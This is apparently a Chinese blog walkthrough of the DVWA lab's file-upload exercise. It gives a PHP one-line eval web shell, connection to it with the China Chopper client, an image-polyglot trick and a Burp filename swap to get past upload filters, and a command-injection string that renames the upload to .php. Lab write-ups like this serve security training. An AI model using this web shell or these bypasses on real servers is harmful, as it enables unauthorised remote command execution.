Low安全级别:
<?php @eval($_POST['cmd']);?>
文本编辑器写入一句话木马,保存并改为php文件。
上传
成功上传,并返回路径
打开菜刀客户端连接
成功连接
反弹shell
Medium安全级别
上传php脚本发现,上传类型做了限制,只允许上传JPEG和PNG类型。
思路一:利用图片马上传
将php和jpeg文件 用copy命令 合成一张图片
Copy behinder.php/b +image.jpeg/a imageHack.jpeg
上传图片马
上传成功
菜刀连接
连接成功,返回shell.
思路二:burp抓包改文件格式
如图 抓包 filename 为jpeg格式
将其改为php格式
发送请求包
上传成功
菜刀连接地址
成功
三.high安全级别
同样能用图片马连接成功,但是无法返回shell
需要结合High级别的文件包含漏洞一起利用。
127.0.0.1 & mv .. /../hackable/uploads/behinder.jpeg ../../hackable/uploads/behinder1.php
将 jpeg文件重命名为php执行。
再用菜刀进行连接。
标签:文件,..,jpeg,DVWA,php,上传,连接,安全级别 From: https://www.cnblogs.com/fugodd-hacker/p/17393837.html